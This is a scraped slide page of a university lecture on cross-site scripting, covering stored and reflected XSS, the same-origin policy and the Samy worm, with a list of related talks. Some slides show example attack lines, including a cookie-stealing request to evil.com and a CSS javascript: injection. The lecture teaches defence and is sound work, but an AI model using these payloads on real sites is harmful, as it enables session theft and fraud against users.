server side web security cross site scripting
play

Server-side Web Security: Cross-Site Scripting CS 161: Computer - PowerPoint PPT Presentation

Nov 23, 2022 •213 likes •719 views

Server-side Web Security: Cross-Site Scripting CS 161: Computer Security Prof. Raluca Ada Popa February 9, 2016 Top web vulnerabilities OWASP Top 10

  1. Server-side Web Security: Cross-Site Scripting CS 161: Computer Security Prof. Raluca Ada Popa February 9, 2016

  2. – – – – – – – – – – – – Top web vulnerabilities – – – – – – – OWASP Top 10 – 2013 (New) OWASP Top 10 – 2010 (Previous) – – – A1 – Injection – – A1 – Injection – – – – A3 – Broken Authentication and Session Management – A2 – Broken Authentication and Session Management – – – – – A2 – Cross-Site Scripting (XSS) – A3 – Cross-Site Scripting (XSS) – – – – – A4 – Insecure Direct Object References – A4 – Insecure Direct Object References – – – – – – A5 – Security Misconfiguration A6 – Security Misconfiguration – – – – – � � – – – – – – A7 – Insecure Cryptographic Storage – Merged with A9 � � – – A6 – Sensitive Data Exposure – � � – – – – – – A8 – Failure to Restrict URL Access – Broadened into � � – – A7 – Missing Function Level Access Control – – – – – – A8 – Cross-Site Request Forgery (CSRF) A5 – Cross-Site Request Forgery (CSRF) – – – A9 – Using Known Vulnerable Components <buried in A6: Security Misconfiguration> – – – – – – – – – – – – – 2

  3. Cross-site scripting attack (XSS) • Attacker injects a malicious script into the webpage viewed by a victim user – Script runs in user’s browser with access to page’s data • The same-origin policy does not prevent XSS

  4. Setting: Dynamic Web Pages • Rather than static HTML, web pages can be expressed as a program, say written in Javascript : web page <font size=30> Hello, <b> <script> var a = 1; var b = 2; document.write("world: ", a+b, "</b>"); </script> • Outputs: Hello, world: 3

  5. Javascript • Powerful web page programming language • Scripts are embedded in web pages returned by web server • Scripts are executed by browser. Can: – Alter page contents – Track events (mouse clicks, motion, keystrokes) – Issue web requests, read replies • (Note: despite name, has nothing to do with Java!)

  6. Rendering example web server web browser <font size=30> Hello, <b> <script> var a = 1; var b = 2; document.write("world: ", a+b, "</b>"); </script> Browser’s rendering engine: 1. Call HTML parser 3. HTML parser continues: - tokenizes, starts creating DOM tree - creates DOM - notices <script> tag, yields to JS engine 4. Painter displays DOM to user 2. JS engine runs script to change page Hello, world: 3 <font size=30> Hello, <b>world: 3</b>

  7. Confining the Power of Javascript Scripts • Given all that power, browsers need to make sure JS scripts don’t abuse it hackerz.com bank.com • For example, don’t want a script sent from hackerz.com web server to read or modify data from bank.com • … or read keystrokes typed by user while focus is on a bank.com page!

  8. Same Origin Policy Recall: • Browser associates web page elements (text, layout, events) with a given origin • SOP = a script loaded by origin A can access only origin A’s resources (and it cannot access the resources of another origin)

  9. XSS subverts the same origin policy • Attack happens within the same origin • Attacker tricks a server (e.g., bank.com ) to send malicious script ot users • User visits to bank.com Malicious script has origin of bank.com so it is permitted to access the resources on bank.com

  10. Two main types of XSS • Stored XSS: attacker leaves Javascript lying around on benign web service for victim to load • Reflected XSS: attacker gets user to click on specially-crafted URL with script in it, web service reflects it back

  11. Stored (or persistent) XSS • The attacker manages to store a malicious script at the web server, e.g., at bank.com • The server later unwittingly sends script to a victim’s browser • Browser runs script in the same origin as the bank.com server

  12. Stored XSS (Cross-Site Scripting) Attack Browser/Server evil.com

  13. Stored XSS (Cross-Site Scripting) Attack Browser/Server evil.com 1 Inject malicious script Server Patsy/Victim bank.com

  14. Stored XSS (Cross-Site Scripting) Attack Browser/Server evil.com 1 Inject malicious User Victim script Server Patsy/Victim bank.com

  15. Stored XSS (Cross-Site Scripting) Attack Browser/Server evil.com 1 Inject malicious User Victim script Server Patsy/Victim bank.com

  16. Stored XSS (Cross-Site Scripting) Attack Browser/Server evil.com 1 Inject malicious User Victim script Server Patsy/Victim bank.com

  17. Stored XSS (Cross-Site Scripting) Attack Browser/Server evil.com 1 Inject malicious User Victim script Server Patsy/Victim 4 execute script embedded in input as though server meant us to run it bank.com

  18. Stored XSS (Cross-Site Scripting) Attack Browser/Server evil.com 1 Inject malicious User Victim script Server Patsy/Victim 4 execute script embedded in input as though server meant us to run it bank.com

  19. Stored XSS (Cross-Site Scripting) Attack Browser/Server evil.com 1 Inject malicious User Victim script Server Patsy/Victim 4 execute script embedded in input as though server meant us to run it E.g., GET http://bank.com/sendmoney?to=DrEvil&amt=100000

  20. Stored XSS (Cross-Site Scripting) Attack Browser/Server And/Or: 6 evil.com 1 Inject malicious User Victim script Server Patsy/Victim 4 execute script embedded in input as though server meant us to run it bank.com

  21. Stored XSS (Cross-Site Scripting) Attack Browser/Server And/Or: 6 evil.com 1 E.g., GET http://evil.com/steal/ document.cookie Inject malicious User Victim script Server Patsy/Victim 4 execute script embedded in input as though server meant us to run it bank.com

  22. Stored XSS (Cross-Site Scripting) Attack Browser/Server 6 evil.com 1 Inject malicious User Victim script Server Patsy/Victim 4 execute script (A “ stored ” embedded in input XSS attack) as though server meant us to run it bank.com

  23. Stored XSS: Summary • Target: user who visits a vulnerable web service • Attacker goal: run a malicious script in user’s browser with same access as provided to server’s regular scripts (subvert SOP = Same Origin Policy ) • Attacker tools: ability to leave content on web server page (e.g., via an ordinary browser); • Key trick: server fails to ensure that content uploaded to page does not contain embedded scripts

  24. Demo: stored XSS

  25. MySpace.com (Samy worm) • Users can post HTML on their pages – MySpace.com ensures HTML contains no <script>, <body>, onclick, <a href=javascript://> – … but can do Javascript within CSS tags: <div style=“background:url(‘javascript:alert(1)’)”> • With careful Javascript hacking, Samy worm infects anyone who visits an infected MySpace page – … and adds Samy as a friend. – Samy had millions of friends within 24 hours. http://namb.la/popular/tech.html

  26. Twitter XSS vulnerability User figured out how to send a tweet that would automatically be retweeted by all followers using vulnerable TweetDeck apps.

  27. Stored XSS using images Suppose pic.jpg on web server contains HTML ! • request for http://site.com/pic.jpg results in: HTTP/1.1 200 OK … Content-Type: image/jpeg <html> fooled ya </html> • IE will render this as HTML (despite Content-Type) • Consider photo sharing sites that support image uploads • What if attacker uploads an “image” that is a script?

  28. Reflected XSS • The attacker gets the victim user to visit a URL for bank.com that embeds a malicious Javascript • The server echoes it back to victim user in its response • Victim’s browser executes the script within the same origin as bank.com

  29. Reflected XSS (Cross-Site Scripting) Victim client

  30. Reflected XSS (Cross-Site Scripting) Attack Server 1 evil.com Victim client

  31. Reflected XSS (Cross-Site Scripting) Attack Server 1 2 evil.com Victim client

  32. Reflected XSS (Cross-Site Scripting) Attack Server 1 2 evil.com Exact URL under attacker’s control Victim client Server Patsy/Victim bank.com

  33. Reflected XSS (Cross-Site Scripting) Attack Server 1 2 evil.com Victim client Server Patsy/Victim bank.com

  34. Reflected XSS (Cross-Site Scripting) Attack Server 1 2 evil.com Victim client 5 Server Patsy/Victim execute script embedded in input as though server meant us to run it bank.com

  35. Reflected XSS (Cross-Site Scripting) Attack Server 1 2 evil.com Victim client 5 Server Patsy/Victim execute script embedded in input as though server meant us to run it bank.com

  36. Reflected XSS (Cross-Site Scripting) Attack Server And/Or: 1 2 evil.com 7 Victim client 5 Server Patsy/Victim execute script embedded in input as though server meant us to run it bank.com

  37. Reflected XSS (Cross-Site Scripting) Attack Server 1 2 evil.com 7 ( “ Reflected ” XSS attack) Victim client 5 Server Patsy/Victim execute script embedded in input as though server meant us to run it bank.com

Recommend

Don't Trust The Locals: Exploiting Persistent Client-Side Cross-Site Scripting in the Wild Marius

Don't Trust The Locals: Exploiting Persistent Client-Side Cross-Site Scripting in the Wild Marius

Don't Trust The Locals: Exploiting Persistent Client-Side Cross-Site Scripting in the Wild Marius Ste ff ens German OWASP Day 2018 joint work with Christian Rossow, Martin Johns and Ben Stock Dimensions of Cross-Site Scripting Server Client

413 views • 14 slides
A3: Cross-site Scripting (XSS) (JavaScript injection) Prevalence Stock et.al. How the Web

A3: Cross-site Scripting (XSS) (JavaScript injection) Prevalence Stock et.al. How the Web

A3: Cross-site Scripting (XSS) (JavaScript injection) Prevalence Stock et.al. How the Web Tangled Itself: Uncovering the History of Client- Side Web (In)Security, USENIX Security 2017 But first..JavaScript security Pages now loaded

482 views • 46 slides
Outline Cross-site scripting CSci 5271 More cross-site risks Introduction to Computer Security

Outline Cross-site scripting CSci 5271 More cross-site risks Introduction to Computer Security

Outline Cross-site scripting CSci 5271 More cross-site risks Introduction to Computer Security Web security, part 2 Announcements intermission Stephen McCamant Confidentiality and privacy University of Minnesota, Computer Science &amp;

892 views • 6 slides
SQL Injection Last Few Lectures XSS - Cross-site scripting XSRF/CSRF - Cross-site request

SQL Injection Last Few Lectures XSS - Cross-site scripting XSRF/CSRF - Cross-site request

SQL Injection Last Few Lectures XSS - Cross-site scripting XSRF/CSRF - Cross-site request forgery Code Injection Attacks Attacker executes arbitrary code on server Programming the program Not sanitizing user

287 views • 11 slides
Web Security, Summer Term 2012 Cross Site Scripting - XSS Dr. E. Benoist Sommer Semester Web

Web Security, Summer Term 2012 Cross Site Scripting - XSS Dr. E. Benoist Sommer Semester Web

IIG University of Freiburg Web Security, Summer Term 2012 Cross Site Scripting - XSS Dr. E. Benoist Sommer Semester Web Security, Summer Term 2012 5 Cross Site Scripting 1 Table of Contents Presentation: Inject Javascript in a Page

506 views • 26 slides
Outline Cross-site scripting Announcements intermission CSci 5271 More cross-site risks

Outline Cross-site scripting Announcements intermission CSci 5271 More cross-site risks

Outline Cross-site scripting Announcements intermission CSci 5271 More cross-site risks Introduction to Computer Security Confidentiality and privacy Day 19: Web security, part 2 Stephen McCamant Even more web risks University of

386 views • 11 slides
Session 19 Introduction to Server-Side Scripting 1 Lecture Objectives Recognize that a

Session 19 Introduction to Server-Side Scripting 1 Lecture Objectives Recognize that a

Session 19 Server Side Scripting Session 19 Introduction to Server-Side Scripting 1 Lecture Objectives Recognize that a server script provides a way to extend an html page to include logic and insertion of data Understand the

612 views • 12 slides
Outline Cross-site scripting, contd More cross-site risks CSci 5271 Introduction to Computer

Outline Cross-site scripting, contd More cross-site risks CSci 5271 Introduction to Computer

Outline Cross-site scripting, contd More cross-site risks CSci 5271 Introduction to Computer Security Announcements intermission Web security and crypto failure combined Confidentiality and privacy lecture Even more web risks Stephen

435 views • 10 slides
Cross-Site Scripting Attack (XSS) Outline The Cross-Site Scripting attack Reflected

Cross-Site Scripting Attack (XSS) Outline The Cross-Site Scripting attack Reflected

Cross-Site Scripting Attack (XSS) Outline The Cross-Site Scripting attack Reflected XSS Persistent XSS Damage done by XSS attacks XSS attacks to befriend with others XSS attacks to change other peoples

3.65k views • 37 slides
Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems

Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems

Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems Browser same origin policy Key security principle: a web browser permits scripts contained in a first web page to access data in a second web page,

358 views • 22 slides
Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems

Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems

Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems Browser same origin policy Key security principle: a web browser permits scripts contained in a first web page to access data in a second web page,

1.12k views • 25 slides
Web Security: Vulnerabilities &amp; Attacks Dawn Song Cross-site Scripting Dawn Song What is

Web Security: Vulnerabilities &amp; Attacks Dawn Song Cross-site Scripting Dawn Song What is

Computer Security Course. Dawn Computer Security Course. Dawn Song Song Web Security: Vulnerabilities &amp; Attacks Dawn Song Cross-site Scripting Dawn Song What is Cross-site Scripting (XSS)? Vulnerability in web application that

760 views • 53 slides
CROSS SITE SCRIPTING (XSS) ATTACKS Injection attacks 3/18/19 1 Whoami Ad Adam Nu Nurudin

CROSS SITE SCRIPTING (XSS) ATTACKS Injection attacks 3/18/19 1 Whoami Ad Adam Nu Nurudin

CROSS SITE SCRIPTING (XSS) ATTACKS Injection attacks 3/18/19 1 Whoami Ad Adam Nu Nurudin ini CEH, ITIL L V3, 3, CCNA, CCNP, CASP, PCI-DS DSS.. .. Lead Security Researcher @ Netwatch Technologies Project Consultant, Information

377 views • 20 slides
Server-side Scripting Slides courtesy of Xenia Mountrouidou URLs and web servers 2

Server-side Scripting Slides courtesy of Xenia Mountrouidou URLs and web servers 2

Server-side Scripting Slides courtesy of Xenia Mountrouidou URLs and web servers 2 http://server/path/file Usually when you type a URL in your browser: Your computer looks up the server's IP address using DNS Your browser connects

645 views • 36 slides
Web Security Instructor: Fengwei zhang SUSTech CS 315 Computer Security 1 The Web

Web Security Instructor: Fengwei zhang SUSTech CS 315 Computer Security 1 The Web

Web Security Instructor: Fengwei zhang SUSTech CS 315 Computer Security 1 The Web Security for the World-Wide Web (WWW) New vulnerabilities to consider: SQL injection, Cross-site Scripting (XSS), Session Hijacking, and Cross-site

854 views • 57 slides
Cross-Site Scripting: analysis, identification and exploitation Mauro Gentile Web Application

Cross-Site Scripting: analysis, identification and exploitation Mauro Gentile Web Application

Cross-Site Scripting: analysis, identification and exploitation Mauro Gentile Web Application Security course (Elective in Computer Networks) prof. Fabrizio d'Amore Dept. of Computer, Control, and Management Engineering Antonio Ruberti

729 views • 28 slides
PHP Introduction ATLS 3020 Digital Media 2 Aileen Pierce Client vs. Server Side Scripting

PHP Introduction ATLS 3020 Digital Media 2 Aileen Pierce Client vs. Server Side Scripting

PHP Introduction ATLS 3020 Digital Media 2 Aileen Pierce Client vs. Server Side Scripting Client-side scripting (browser) Designed to interact with the user s web page Event-driven Restricted to what a web browser can

329 views • 29 slides
Perl/CGI Perl/CGI is a server-side scripting language, used to run arbitrary programs within the

Perl/CGI Perl/CGI is a server-side scripting language, used to run arbitrary programs within the

Perl/CGI Perl/CGI is a server-side scripting language, used to run arbitrary programs within the web server. The web server is configured to understand the Perl scripts and to execute them. The web server on CCC is configured to connect to both

352 views • 7 slides
Document Structure Integrity: A Robust Basis for Cross-Site Scripting Defense Yacin Nadji

Document Structure Integrity: A Robust Basis for Cross-Site Scripting Defense Yacin Nadji

Document Structure Integrity: A Robust Basis for Cross-Site Scripting Defense Yacin Nadji Prateek Saxena Dawn Song Illinois Institute UC Berkeley UC Berkeley Of Technology 1 A Cross-Site Scripting Attack Hi Joe, &lt;img src=&gt;

569 views • 42 slides
CS/COE 1520 pitt.edu/~ach54/cs1520 Server-side scripting with Flask Flask A micro web

CS/COE 1520 pitt.edu/~ach54/cs1520 Server-side scripting with Flask Flask A micro web

CS/COE 1520 pitt.edu/~ach54/cs1520 Server-side scripting with Flask Flask A micro web framework written in Python First release was in 2010 Current version (1.1.1) was released in July 2019 Currently powers LinkedIn and

278 views • 8 slides
Writing Secure Code Wash all user-submitted data Vulnerabilities XSS - Cross-site scripting

Writing Secure Code Wash all user-submitted data Vulnerabilities XSS - Cross-site scripting

Writing Secure Code Wash all user-submitted data Vulnerabilities XSS - Cross-site scripting Executing unauthorized code XSRF - Cross-site request forgery Remote execution for logged-in users SQL Injection A malicious variable placed into a

681 views • 18 slides
Cl Clien ient-side side sec ecurity urity ri risk sks s esp. . HTML TML injection

Cl Clien ient-side side sec ecurity urity ri risk sks s esp. . HTML TML injection

Web b Securi urity ty Cl Clien ient-side side sec ecurity urity ri risk sks s esp. . HTML TML injection jection and nd XSS SS (Cross oss Si Site te Sc Scripting ipting) 1 Last week malicious input brow owser ser web

844 views • 67 slides
Cyber@UC Meeting 43 Cross-site scripting (XSS) CEH Cryptography and Recon If Youre New!

Cyber@UC Meeting 43 Cross-site scripting (XSS) CEH Cryptography and Recon If Youre New!

Cyber@UC Meeting 43 Cross-site scripting (XSS) CEH Cryptography and Recon If Youre New! Join our Slack ucyber.slack.com SIGN IN! Feel free to get involved with one of our committees: Content, Finance, Public Affairs, Outreach,

560 views • 26 slides
Cross-Channel Scripting e t u p m Impact on Embedded Web Interfaces o C d r o f Hristo

Cross-Channel Scripting e t u p m Impact on Embedded Web Interfaces o C d r o f Hristo

b a L y t i r u c e S r Cross-Channel Scripting e t u p m Impact on Embedded Web Interfaces o C d r o f Hristo Bojinov Elie Bursztein Dan Boneh n a Stanford Computer Security Lab t S Cross-channel scripting

1.09k views • 68 slides

More recommend